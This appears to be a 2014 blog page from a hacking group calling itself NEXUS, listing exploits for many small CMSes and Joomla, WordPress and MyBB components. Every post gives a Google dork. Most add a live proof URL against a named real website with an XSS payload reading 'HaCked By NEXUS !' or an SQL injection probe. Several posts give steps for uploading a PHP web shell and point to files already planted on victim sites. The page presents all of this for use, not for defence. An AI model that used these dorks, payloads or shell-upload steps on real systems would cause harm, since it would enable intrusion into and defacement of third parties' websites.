Backtrack Team: NEXUS

Affichage des articles dont le libellé est NEXUS. Afficher tous les articles

[XSS] noname-media

Dork:

intext:"powered by www.noname-media.com" inurl:"/view.php?id="

Exploit:

/view.php?id=

Live Demo:

http://www.rws-e.de/php/galerie/view.php?id=4&next=1&categorie=3%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E

NEXUS - Sharing Is Caring

by Malik korrich ~ dimanche 6 juillet 2014 0 commentaires

ProActive CMS - XSS

Dork:

intext:"Powered by Proactive CMS"

Exploit:

/admin.php?action=newuser (XSS)

Live Demo:

http://www.proactivecms.com/admin.php?action=newuser%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E

NEXUS - Sharing Is Caring

by Malik korrich ~ 0 commentaires

Joomla Collector Shell Uploader

Dork:

inurl:index.php?option=com_collector

Exploit:

/index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1

Live Demo:

http://www.volontarimini.it/volontarimini2012/index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1

NEXUS - Sharing Is Caring

by Malik korrich ~ 0 commentaires

Joomla Aclassif - XSS

Dork:

inurl:"index.php?option=com_aclassif"

Exploit:

/index.php/component/aclassif/?

Example & Live Demo:

http://www.thegreekstar.com/index.php/component/aclassif/?%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,78,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E

NEXUS - Sharing Is Caring

by Malik korrich ~ 0 commentaires

Pro-Service - XSS Vulnerability

Dorks:

intext:"Pro-Service" inurl:"/resume_list.php?id="

intext:"Pro-Service"

Exploit:

/resume_list.php?id=

Live Demo:

http://www.staff.ge/resume_list.php?id=2%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,78,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E

NEXUS - Sharing Is Caring

by Malik korrich ~ samedi 5 juillet 2014 0 commentaires

MyBB Kingchat - XSS

Dork:

inurl:/kingchat.php?

Exploit:

/kingchat.php?notic

Change that /... into this to see exploit:

/kingchat.php?chat=2&l=2

Then add your scripts...

Live Demo:

http://www.embargoedchat.co.uk/kingchat.php?chat=2&l=2%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E

NEXUS - Sharing Is Caring

by Malik korrich ~ 0 commentaires

Pej Studio & Nissi Infotech & Plante Graffix - Cross Site Scripting (XSS)

Dork:

intext:"Created By Nissi Infotech"

Exploits:

http://target.com/name.php?id= [XSS & SQLI]

Live Demo:

http://www.jayapriya.com/realestate/projectdetail.php?id=42%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E

NEXUS - Sharing Is Caring

by Malik korrich ~ 0 commentaires

Seventeen Design XSS & SQLI

Dork:

intext:"Producido por: Seventeen Design."

Exploits:

http://site.com/*.*id=

Live Demo:

SQLI + XSS:

http://www.murcian.com/aig/nota.php?id=9%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,69,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E

NEXUS - Sharing Is Caring

by Malik korrich ~ vendredi 4 juillet 2014 0 commentaires

Espacio Ecuador XSS & SQLI

Dork:

intext:"developed by Espacio Ecuador"

Exploits:

http://site.com/*.*?id=

http://site.com/*.*?id= < XSS>

Live Demo:

SQLI:

http://www.galapagostraveline.com/deal.html?opc=31%27

XSS:

http://www.galapagostraveline.com/deal.html?opc=31%22%3E%3Cscript%3Ealert%281337%29;%3C/script%3E

NEXUS - Sharing Is Caring

by Malik korrich ~ 0 commentaires

WordPress zarzadzanie_kontem Plugin

Dork:

inurl:"/wp-content/plugins/zarzadzanie_kontem/"

Live Demo:

http://kursrekodziela.pl/images/user-images/front-end/guest/2014/07/NEXUS.txt

NEXUS - Sharing Is Caring

by Malik korrich ~ 0 commentaires

Arwen Cross Site Scripting & SQL Injection

Dork:

intext:"website realizado por Arwen desarrollo web y diseño"

Exploits:

http://site.com/index.php?m=

http://site.com/index.php?mod= < SQLI>

http://site.com/index.php?m=

http://site.com/index.php?mod=

Live Demo:

SQLI:

http://www.raulmadinabeitia.com/grupos.php?mod=61&id=97%27

XSS:

http://www.raulmadinabeitia.com/grupos.php?mod=61&id=97%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E

NEXUS - Sharing Is Caring

by Malik korrich ~ 0 commentaires

MD Webmarketing Cross Site Scripting / SQL Injection

Dork:

"Desenvolvido por: MD-WEBMARKETING" inurl:.php?id=

Exploits:

http://www.site-web.com/***.php?id= [SQL Injection]

http://www.site-web.com/***.php?id=**********&busca= [Cross Site Scripting]

Live Demo:

SQL Injection:

http://www.pierreadrileiloes.com.br/exibe.php?id=61712%27

XSS (with HTML scripts):

http://www.edinhoneves.com/exibe.php?id=231&cod_editorial=1&url=index.php&pag=0&busca=%22%3E%3Ch1%3EHaCked%20By%20NEXUS%20!%3C/h1%3E

XSS (with JavaScript):

http://www.edinhoneves.com/exibe.php?id=231&cod_editorial=1&url=index.php&pag=0&busca=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E

http://www.edinhoneves.com/exibe.php?id=231&cod_editorial=1&url=index.php&pag=0&busca=%22%3E%3Cimg%20src=x%20onerror=alert%28%22NEXUS%22%29;%3E

NEXUS - Sharing Is Caring

by Malik korrich ~ 0 commentaires

milkshakedesign CMS - XSS Vulnerability

Dork:

intext:"Website by Milkshake Design" inurl:"/programmeview.php?pid="

Exploit:

programmeview.php?pid=

Example & Live Demo:

http://www.optimumtelevision.com/programmeview.php?pid=310%22%3E%3Cscript%3Ealert%28%22HaCked%20By%20NEXUS%20!%22%29%3C/script%3E

NEXUS

by Malik korrich ~ jeudi 3 juillet 2014 0 commentaires

XSS Found By NEXUS !

I found all XSS in those sites :D

http://pastebin.com/fGSr5sn3

NEXUS

by Malik korrich ~ 0 commentaires

mc-creation CMS - XSS Vulnerability

Dorks:

intext:"web design solution" inurl:"product_view.php?pid="

intext:"web design solution"

Exploit:

"product_view.php?pid="

Examples & Live Demos:

Testing:

http://www.toupretpro.co.uk/products/product_view.php?pid=10%22%3E%3Cscript%3Ealert%281337%29;%3C/script%3E

String to char:

http://www.toupretpro.co.uk/products/product_view.php?pid=10%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E

NEXUS

by Malik korrich ~ 0 commentaires

Morgane CMS - XSS Vulnerability

Dorks:

intext:"www.morgane.co.uk" inurl:"/main.php?sid="

intext:"www.morgane.co.uk" inurl:"/main.php?id="

Use string to char.. Or use numbers..

Example & Live Demo:

String to char mode:

http://www.donkeyisland.org/main.php?id=505%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E

http://hospitality.wayout.net/en/main.php?sid=96%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E

Numbers mode (testing mode):

http://www.donkeyisland.org/main.php?id=505%22%3E%3Cscript%3Ealert%281337%29;%3C/script%3E

http://hospitality.wayout.net/en/main.php?sid=96%22%3E%3Cscript%3Ealert%281337%29;%3C/script%3E

* Can run XSS only on Firefox not Google Chrome :D

NEXUS

by Malik korrich ~ 0 commentaires

Joomla - com_joomla_flash_uploader Remote File Upload

Dork:

inurl:index.php?option=com_joomla_flash_uploader

What are you waiting for? Upload your shell or your index or stuffs..

Live Demo:

http://sheetstalks.com/images/phocadownload/

http://sheetstalks.com/images/phocadownload/NEXUS.txt

NEXUS

by Malik korrich ~ mercredi 2 juillet 2014 0 commentaires

Kingcow CMS Cross Site Scripting

Dorks:

inurl:"search.php?for="

intext:"Powered by Central"

* for parameter in search.php is VULNERABLE to XSS..

Exploits:

">&search_submit=Search

Or if you can't use normal script.. Change it from string to character:

">&search_submit=Search

These char "String.fromCharCode(72, 97, 67, 107, 101, 100, 32, 66, 121, 32, 78, 69, 88, 85, 83, 32, 33)" is "HaCked By NEXUS !" using Hack Bar of Firefox...

If you dont have that "Hack Bar" .. Download it from :

https://addons.mozilla.org/en-US/firefox/addon/hackbar/

Live Demo:

http://hdmixtapes.com/search.php?for=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E&search_submit=Search

http://artnews.org/search.php?for=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083%29%29;%3C/script%3E&search_submit=Search

NEXUS

by Malik korrich ~ mardi 1 juillet 2014 0 commentaires

Cm3 CMS Cross Site Scripting (XSS)

Dork:

intext:"Powered by cm3"

* Keywords & strSearchPhrase Parametrs In Search.asp Are Vulnerable to XSS..

Exploits:

http://www.NEXUS.com/forums/search.asp?strSearchPhrase=">&ContainerID=&forumsearchoption=topics

http://www.NEXUS,com/search.asp?keywords=">&SearchType=And&;CurrentPage=1

http://www.NEXUS.com/search.asp?CurrentPage=1&sitekeywords">&;SearchType=Default

http://www.NEXUS.com/search.asp?SearchType=Keywords&Keywords=">&x=0&y=0

Live Demo:

http://www.ergonomics.org.au/forums/search.asp?strSearchPhrase=%22%3E%3Cscript%3Ealert%28%22HaCked%20By%20NEXUS%20!%22%29;%3C/script%3E&ContainerID=&forumsearchoption=topics

NEXUS

by Malik korrich ~ 0 commentaires

Fluidgalleries Photo Upload Remote - File Upload Vulnerability

Dorks:

inurl:"fluidgalleries/dat/info.dat"

inurl:"/fluidgalleries/php/"

Exploit:

http://localhost/[path]/fluidgalleries/php/photo-upload.php

*Use Firefox...

Use Live HTTP Headers... Then go to here:

http://localhost/[path]/fluidgalleries/php/photo-upload.php

1.Click the Choose File button Then select a file [shell.php.jpg]

2.Then click on the upload button.

3. Now using Live HTTP Headers uploaded files to PHP change [shell.php]

4. Then go to this page :

http://localhost/[path]/fluidgalleries/photos/ [Random number+shell.php]

Example: 1NEXUS.php

.. Video proof exploits :

http://m-h-a-c-k-e-r.persiangig.com/Black.Idc-Team/fluidgalleriesExploit/fluidgalleriesExploit.swf

by Malik korrich ~ lundi 30 juin 2014 0 commentaires

[XSS] noname-media

ProActive CMS - XSS

Joomla Collector Shell Uploader

Joomla Aclassif - XSS

Pro-Service - XSS Vulnerability

MyBB Kingchat - XSS

Pej Studio & Nissi Infotech & Plante Graffix - Cross Site Scripting (XSS)

Seventeen Design XSS & SQLI

Espacio Ecuador XSS & SQLI

WordPress zarzadzanie_kontem Plugin

Arwen Cross Site Scripting & SQL Injection

MD Webmarketing Cross Site Scripting / SQL Injection

milkshakedesign CMS - XSS Vulnerability

XSS Found By NEXUS !

mc-creation CMS - XSS Vulnerability

Morgane CMS - XSS Vulnerability

Joomla - com_joomla_flash_uploader Remote File Upload

Kingcow CMS Cross Site Scripting

Cm3 CMS Cross Site Scripting (XSS)

Fluidgalleries Photo Upload Remote - File Upload Vulnerability

ads

Category

Total Pageviews

ads

Category

Follow us

Total Pageviews